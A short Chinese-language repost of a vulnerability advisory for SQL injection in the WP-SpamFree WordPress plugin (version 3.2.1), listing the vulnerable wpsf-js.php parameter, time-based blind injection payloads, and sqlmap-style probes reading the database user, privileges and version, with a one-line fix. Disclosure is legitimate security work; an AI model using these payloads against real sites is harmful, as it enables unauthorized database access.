WP-SpamFree WordPress Spam插件SQL注射缺陷及修复

WP-SpamFree WordPress Spam插件SQL注射缺陷及修复 - 网站

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] 标题:[ WordPress wpsf-js plugin, SQL Injection]作者: [cheki] www.2cto.com影响版本:[3.2.1]测试平台:[linux]工具: [sqlmap]#SQL注射http://www.2cto.com /wp-content/plugins/wp-spamfree/js/wps......

标题:[ WordPress wpsf-js plugin, SQL Injection]
作者: [cheki] www.2cto.com
影响版本:[3.2.1]
测试平台:[linux]
工具: ["sqlmap"]
#SQL注射
http://www.2cto.com /wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1

测试:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5)

#[http://www.2cto.com :80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][CURRENT_USER()

#http://www.2cto.com :80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM
mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

#http://www.2cto.com :80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6)

修复：过滤相应页面

openEngine 2.0多个盲注缺陷及修复 - 网站安全 - 自学

根据日志逆向分析攻击者入侵思路及查找0day - 网

子栏目

WP-SpamFree WordPress Spam插件SQL注射缺陷及修复 - 网站

最新评论

添加评论

更多文章推荐

添加评论